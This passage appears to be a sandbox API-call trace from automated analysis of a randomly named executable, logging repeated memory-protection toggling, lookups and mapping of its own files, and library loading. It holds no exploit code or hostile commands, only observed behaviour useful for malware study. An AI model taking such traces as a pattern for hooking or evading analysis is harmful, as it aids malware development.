NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.855] GetCurrentProcess () returned 0xffffffff [0059.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1014, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.855] GetCurrentProcess () returned 0xffffffff [0059.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f10b0, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.855] GetCurrentProcess () returned 0xffffffff [0059.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f10b0, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.855] GetCurrentProcess () returned 0xffffffff [0059.855] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f10f8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f10f8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f110c, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f110c, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f111c, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f111c, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.856] GetCurrentProcess () returned 0xffffffff [0059.856] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1120, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.857] GetCurrentProcess () returned 0xffffffff [0059.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1120, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.857] GetCurrentProcess () returned 0xffffffff [0059.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1124, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.857] GetCurrentProcess () returned 0xffffffff [0059.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1124, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.857] GetCurrentProcess () returned 0xffffffff [0059.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1138, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.857] GetCurrentProcess () returned 0xffffffff [0059.857] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f1138, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11b8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11b8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11c0, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11c0, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11c8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x4, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x20) returned 0x0 [0059.858] GetCurrentProcess () returned 0xffffffff [0059.858] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ebfc*=0x772f11c8, NumberOfBytesToProtect=0x41ec00, NewAccessProtection=0x20, OldAccessProtection=0x41ec34 | out: BaseAddress=0x41ebfc*=0x772f1000, NumberOfBytesToProtect=0x41ec00, OldAccessProtection=0x41ec34*=0x4) returned 0x0 [0059.859] UrlIsW (pszUrl="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", UrlIs=0x0) returned 0 [0059.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0059.859] GetLastError () returned 0x2 [0059.859] SysReAllocStringLen (in: pbstr=0x41ec70*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41ec70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0059.859] GetThreadLocale () returned 0x409 [0059.859] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.859] GetThreadLocale () returned 0x409 [0059.860] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.860] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", nBufferLength=0x104, lpBuffer=0x41e9f4, lpFilePart=0x41e9f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", lpFilePart=0x41e9f0*="WAQro5oWEZAnSlij.exe.config") returned 0x41 [0059.860] SysReAllocStringLen (in: pbstr=0x41ec70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41ec70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0059.860] SysReAllocStringLen (in: pbstr=0x41ec20*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", len=0x41 | out: pbstr=0x41ec20*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config") returned 1 [0059.860] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", cchLength=0x41 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config") returned 0x41 [0059.860] SysReAllocStringLen (in: pbstr=0x41ec70*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe.config", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config", len=0x41 | out: pbstr=0x41ec70*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe.config") returned 1 [0059.860] SetLastError (dwErrCode=0x2) [0059.878] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c [0059.878] GetLastError () returned 0x0 [0059.878] SysReAllocStringLen (in: pbstr=0x41ec78*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.878] GetThreadLocale () returned 0x409 [0059.878] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.878] GetThreadLocale () returned 0x409 [0059.878] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.878] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41e9fc, lpFilePart=0x41e9f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41e9f8*="WAQro5oWEZAnSlij.exe") returned 0x3a [0059.878] SysReAllocStringLen (in: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.878] SysReAllocStringLen (in: pbstr=0x41ec28*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec28*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.878] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchLength=0x3a | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 0x3a [0059.878] SysReAllocStringLen (in: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x41ec78*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] ResetEvent (hEvent=0xb8) returned 1 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] ResetEvent (hEvent=0xb8) returned 1 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] SetEvent (hEvent=0xbc) returned 1 [0059.879] SetEvent (hEvent=0xb8) returned 1 [0059.879] SetLastError (dwErrCode=0x0) [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.879] GetCurrentThreadId () returned 0xba4 [0059.880] SetEvent (hEvent=0xbc) returned 1 [0059.880] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] ResetEvent (hEvent=0xb8) returned 1 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] ResetEvent (hEvent=0xb8) returned 1 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] SetEvent (hEvent=0xbc) returned 1 [0059.880] SetEvent (hEvent=0xb8) returned 1 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.880] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0059.880] GetCurrentThreadId () returned 0xba4 [0059.881] GetCurrentThreadId () returned 0xba4 [0059.881] GetCurrentThreadId () returned 0xba4 [0059.881] SetEvent (hEvent=0xbc) returned 1 [0059.886] GetCurrentThreadId () returned 0xba4 [0059.886] ResetEvent (hEvent=0xb8) returned 1 [0059.886] GetCurrentThreadId () returned 0xba4 [0059.886] GetCurrentThreadId () returned 0xba4 [0059.886] GetCurrentThreadId () returned 0xba4 [0059.886] GetCurrentThreadId () returned 0xba4 [0059.886] ResetEvent (hEvent=0xb8) returned 1 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] SetEvent (hEvent=0xbc) returned 1 [0059.887] SetEvent (hEvent=0xb8) returned 1 [0059.887] CloseHandle (hObject=0x11c) returned 1 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] ResetEvent (hEvent=0xb8) returned 1 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] ResetEvent (hEvent=0xb8) returned 1 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] GetCurrentThreadId () returned 0xba4 [0059.887] SetEvent (hEvent=0xbc) returned 1 [0059.887] SetEvent (hEvent=0xb8) returned 1 [0059.887] CloseHandle (hObject=0x120) returned 1 [0059.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x120 [0059.887] GetLastError () returned 0x0 [0059.888] SysReAllocStringLen (in: pbstr=0x41ec78*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.888] GetThreadLocale () returned 0x409 [0059.888] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0059.888] GetThreadLocale () returned 0x409 [0059.888] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0059.888] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", nBufferLength=0x104, lpBuffer=0x41e9fc, lpFilePart=0x41e9f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", lpFilePart=0x41e9f8*="WAQro5oWEZAnSlij.exe") returned 0x3a [0059.888] SysReAllocStringLen (in: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.888] SysReAllocStringLen (in: pbstr=0x41ec28*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", len=0x3a | out: pbstr=0x41ec28*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe") returned 1 [0059.888] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", cchLength=0x3a | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 0x3a [0059.888] SysReAllocStringLen (in: pbstr=0x41ec78*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\WAQro5oWEZAnSlij.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe", len=0x3a | out: pbstr=0x41ec78*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\waqro5owezanslij.exe") returned 1 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] ResetEvent (hEvent=0xb8) returned 1 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] ResetEvent (hEvent=0xb8) returned 1 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] GetCurrentThreadId () returned 0xba4 [0059.888] SetEvent (hEvent=0xbc) returned 1 [0059.888] SetEvent (hEvent=0xb8) returned 1 [0059.888] SetLastError (dwErrCode=0x0) [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] SetEvent (hEvent=0xbc) returned 1 [0059.889] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] ResetEvent (hEvent=0xb8) returned 1 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] ResetEvent (hEvent=0xb8) returned 1 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] SetEvent (hEvent=0xbc) returned 1 [0059.889] SetEvent (hEvent=0xb8) returned 1 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.889] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0059.889] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] SetEvent (hEvent=0xbc) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] ResetEvent (hEvent=0xb8) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] ResetEvent (hEvent=0xb8) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] SetEvent (hEvent=0xbc) returned 1 [0059.890] SetEvent (hEvent=0xb8) returned 1 [0059.890] CloseHandle (hObject=0x120) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] ResetEvent (hEvent=0xb8) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] ResetEvent (hEvent=0xb8) returned 1 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] GetCurrentThreadId () returned 0xba4 [0059.890] SetEvent (hEvent=0xbc) returned 1 [0059.891] SetEvent (hEvent=0xb8) returned 1 [0059.891] CloseHandle (hObject=0x11c) returned 1 [0059.894] SysReAllocStringLen (in: pbstr=0x41ec8c*=0x0, psz="api-ms-win-appmodel-runtime-l1-1-0.dll", len=0x26 | out: pbstr=0x41ec8c*="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 1 [0059.894] CharLowerBuffW (in: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll", cchLength=0x26 | out: lpsz="api-ms-win-appmodel-runtime-l1-1-0.dll") returned 0x26 [0059.894] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x0 [0059.923] GetLastError () returned 0x7e [0059.923] SetLastError (dwErrCode=0x7e) [0059.924] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ab4, cbMultiByte=11, lpWideCharStr=0x41da78, cchWideChar=2047 | out: lpWideCharStr="VERSION.dll") returned 11 [0059.925] SysReAllocStringLen (in: pbstr=0x41ea7c*=0x0, psz="VERSION.dll", len=0xb | out: pbstr=0x41ea7c*="VERSION.dll") returned 1 [0059.925] CharLowerBuffW (in: lpsz="VERSION.dll", cchLength=0xb | out: lpsz="version.dll") returned 0xb [0059.925] LoadLibraryExA (lpLibFileName="VERSION.dll", hFile=0x0, dwFlags=0x0) returned 0x75670000 [0059.925] GetLastError () returned 0x0 [0059.925] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671030, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.925] GetCurrentProcess () returned 0xffffffff [0059.925] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671030, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.926] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671038, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.926] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x75671038, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x20, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x4) returned 0x0 [0059.926] GetCurrentProcess () returned 0xffffffff [0059.926] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41ea68*=0x7567103c, NumberOfBytesToProtect=0x41ea6c, NewAccessProtection=0x4, OldAccessProtection=0x41eaa0 | out: BaseAddress=0x41ea68*=0x75671000, NumberOfBytesToProtect=0x41ea6c, OldAccessProtection=0x41eaa0*=0x20) returned 0x0 [0059.926] GetCurrentProcess () returned 